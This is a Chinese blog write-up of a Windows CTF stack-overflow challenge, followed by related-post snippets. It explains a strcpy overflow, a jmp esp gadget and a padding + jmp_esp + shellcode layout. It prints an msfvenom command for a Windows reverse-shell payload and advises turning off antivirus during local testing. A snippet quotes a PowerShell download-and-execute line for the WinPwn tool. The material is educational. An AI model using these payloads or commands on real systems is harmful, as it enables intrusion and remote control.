windows-PWN小计

已于 2022-11-13 21:48:12 修改
阅读量1.3k 收藏 3
点赞数
CC 4.0 BY-SA版权
分类专栏: 学习 文章标签: 安全 学习
于 2022-09-26 11:04:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/127049901

windows-PWN小计

由于最近有同事在考某证所以给了我道windows的PWN,好像windows-pwn的学习相对较少,好像并没有

前置知识

​ 要知道二进制漏洞一般都是万变不离其宗,想堆栈溢出不管是linux下,Windows下,甚至是一些RTOS下,都是由于用户的输入数据(在比赛中通常是标准的IO,真实漏洞挖掘中是一些协议的与服务的数据包)导致了内存的破坏,作为一个pwner在ctf中我们见惯了linux下的PWN,也知道要使用栈溢出等内存破坏漏洞PWN一个程序,非常重要的就是程序开启的保护以及程序的保护壳

Windows下的软件保护

​ 具体保护可以看下面文章的描述

Windows内存保护机制及绕过方法

​ 开发exe程序,大部分都是使用vc,vs等编译器,大部分保护都是这些编译器在编译过程中加入的

具体题目
整理思路

​ 整个程序栈溢出点比较好找,在windows-pwn中比较简单的就是程序没有开启DEP保护,数据段可以执行。具体可以看程序是什么编译器生成的以及加入了哪些保护壳

​ exeinfo截图如下

image-20220926102540902

​ 程序是由vc++中是不会支持到DEP与ASLR的引入的,保护相对是没有的,且程序没有壳,所以可以往内存中注入shellcode执行即可

寻找漏洞触发

​ 经过分析程序是使用strcpy函数将输入拷贝到栈上导致了栈溢出,需要寻找一条jmp esp的指令通过附件中给的dll找到,然后将返回地址劫持到此处,随后就会跳转到之后布置的shellcode上

image-20220926104055816

​ payload的构造如下具体内存中的布局如下

padding + jmp_esp + shellocde

image-20220926104606679

​ shellcode的生成可以使用msf生成reverse_shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=xxx LPORT=xxx -b "xxxx" EXITFUNC=thread -f c
成功反弹

image-20220926105206737

PS

​ 比较坑的一点就是开始没有分析整个程序的代码,整个程序导致一直在测badchar,拿到程序最好还是先分析
第二点就是本地测试的时候记得把杀软关了,它检测到有恶意连接会直接kill掉

winpwn学习(一)
qq_38843883的博客
01-28 1749
本系列记录winpwn学习的全过程,从最简单的栈溢出开始入门winpwn,后期会分析一些经典的cve,在学习安全之余修炼调试技巧 调试工具Nanocode(https://www.nanocode.cn/#/download),调试binaryhttps://www.root-me.org/en/Challenges/App-System/PE32-Stack-buffer-overflow-basic 可以自己编译源码文件,记得关掉相应的保护。 先用ida看看漏洞点,很明显0x041147A处的buff
【CTF资料-0x0001】moeCTF2020-Pwn从入门到入狱 by arttnba3
arttnba3的博客
11-20 788
github blog addr 文章目录[github blog addr](https://archive.next.arttnba3.cn/2020/09/17/%E3%80%90CTF%E8%B5%84%E6%96%99-0x0001%E3%80%91moeCTF2020-Pwn%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%85%A5%E7%8B%B1%20by%20arttnba3/)Pwn从入门到入狱简介:什么是Pwn?预备知识Pwn的解题过程?0基础入门:新人
windows pwn
sky123博客
07-13 2044
附件下载链接程序保护如下,没有开 GS 保护。 程序是一个简单的栈溢出: 利用方法如下:这里有几个易错点: 64 位栈溢出 附件下载链接 和 32 位的程序相似,不过这里溢出字节数较少,需要栈迁移。 ORW 如果题目开启了 保护禁用了 ,那么我们就需要采用 ORW 的方式获取 flag 。Windows 中的 ORW 示例代码如下,其中 和 位于 , 位于 。 由于传递的参数过多 gadget 不好找并且会导致 ROP 过长,因此采取 修改内存属性写 shellcode 的方式 进行 OR
Windows Pwn - stack overflow
dengzhasong7076的博客
10-05 447
测试环境: windows xp 测试代码: #include <stdio.h> #include <windows.h> #define PASSWORD "1234567" int verify_password(char *password){ int authenticated; char buffer[44]; // local buf...
深入剖析 Windows 系统的 PWN 技术
最新发布
m0_57836225的博客
09-16 611
综上所述,Windows 系统的 PWN 技术涉及多个方面,需要攻击者具备深入的技术知识和丰富的经验。攻击者通过挖掘内核中的漏洞,利用这些漏洞来获取更高的权限,从而实现对系统的控制。通过研究权限管理的工作原理,攻击者可以找到漏洞和弱点,从而突破权限限制。例如,利用权限提升漏洞,攻击者可以从普通用户权限提升到管理员权限,进而对系统进行更广泛的控制。例如,利用注册表漏洞、服务漏洞、驱动漏洞等,攻击者可以获取更高的权限。通过内核调试,攻击者可以查看系统的内存、寄存器、线程等信息,从而更好地了解系统的运行状态。
windows pwn 基础知识
sky123博客
06-21 5917
在 Win10 和 Win Server2016 版本之前,只有一种堆类型 NT Heap在 Win10 和 Win Server2016 之后,引入了 Segment Heap(段堆)在之后版本中,除了 UWP 程序之外 一般都继续使用 NT Heap 进行堆管UWP(Universal Windows Platform)是 Win10 引入的一种新的应用程序开发模型,他们采用了一套共享的 API。所以采用 UWP开发的程序,可以在所有 Win10 设备上运行。
从零开始入门pwn(一):pwn的介绍以及部分前置知识
热门推荐
m0_51466347的博客
12-06 4万+
目录 一.前言 二.pwn的介绍 pwn的定义 pwn的题目模式 前置知识 一.Linux 二.C语言 三.汇编语言 四.计算机组成原理 三.总结 一.前言 本人凭着一腔热血想要入门pwn,但却被pwn的高入门门槛泼了一次又一次冷水,趁着自己还记得,写一点心得为后来想入门的跟我一样的零基础新手提供一些帮助。 二.pwn的介绍 pwn的定义 想必很多想要入门的新手都已经通过各种各样的入门文章或视频了解了pwn的定义以及方向,但出于礼貌,我在这里还是再重复一下下。...
第七周-定时器&PWM练习
m0_65889648的博客
10-29 364
stm32基于PWM的呼吸灯实现和stm32定时器中断的应用
网络安全技术自学路线图及职业选择方向
bluemoon_0的博客
03-17 544
网络安全技术自学路线图及职业选择方向
WinPwn:内部Windows Penetrationtest AD-Security的自动化
04-29
WinPwn 在过去的许多内部渗透测试中,由于缺少代理支持,我经常遇到有关现有Powershell Recon / Exploitation脚本的问题。 我还经常一个接一个地运行相同的脚本,以获取有关当前系统和/或域的信息。 为了自动化尽可能多的内部渗透测试过程(侦察和开发),并且出于代理的原因,我编写了具有自动代理识别和集成功能的脚本。 该脚本主要基于其他知名的大型进攻性安全性Powershell项目。 欢迎任何建议,反馈,请求和评论! 只需使用以下命令导入模块: Import-Module .\WinPwn.ps1或iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1') 要绕过AMSI,请采
Wi-PWN.ino.CH.bin
02-10
esp8266杀手固件
Wi-PWN.ino.CH.zip
03-12
ESP8266 wifi安全检测模组
Arduino-Wi-PWN.zip
09-18
Arduino-Wi-PWN.zip,ESP8266 Deauther采用Webuiwi PWN材料设计,Arduino是一家开源软硬件公司和制造商社区。Arduino始于21世纪初,深受电子制造商的欢迎,Arduino通过开源系统提供了很多灵活性。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
pwnwindows无法正确interactive
amber_o0k的博客
11-15 920
cmd和powershell运行pwntools写的py文件有问题,体现为interactive后找不到相关的linux命令,由此引申到vscode也不行。并不是你的脚本有问题,而是windows这些命令行的问题,编码格式?ansi,vt标准之类的?不确定 建议使用pycharm,wsl,虚拟机运行相关文件。 ...
pwn
IX2700123456的博客
08-16 256
0x1.连接 1 r = remote('目标IP或Url',端口号) 2 r = process('./文件名') 3 r = ssh(user='',address='',port=,password='') 0x2.数据交互 1 r.send(data) : 发送数据。 2 r.sendline(data) : 发送一行数据,相当于在数据末尾加\n。 3 ...
【CTF pwnWindows下尝试栈溢出执行任意函数
hans774882968的博客
02-18 4139
buu-ciscn_2019_n_1是一道可以通过栈溢出修改变量为所需值的入门pwn。这题有两个解法,我受到这题的启发,搞一个Windows版本的小实验。 目标:执行函数func。 环境:Windows10,编译出的exe是32位的;小端存储。 编译命令:g++ 1.cpp -g -o 1.exe,g++版本: Thread model: win32 gcc version 8.2.0 (MinGW.org GCC-8.2.0-5) 作者:hans774882968以及hans774882968 文章目录
pwn学习(一)
weixin_33701617的博客
08-12 1348
实战前的准备 pwn在ctf中算是一个门槛较高的分支,而且这方面的资料也相对较少,所以学习pwn的人也是相对较少的。我本人呢,是一个菜鸟,本科不是计算机系的,学习这个完全是出于兴趣。写这些东西,一来是记录自己的学习状况,二来呢,就是希望给正准备踏上pwn这条路的朋友们,提供一点思路。 废话不多说,开始进入正题: 1. 学习pwn所需要的...
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值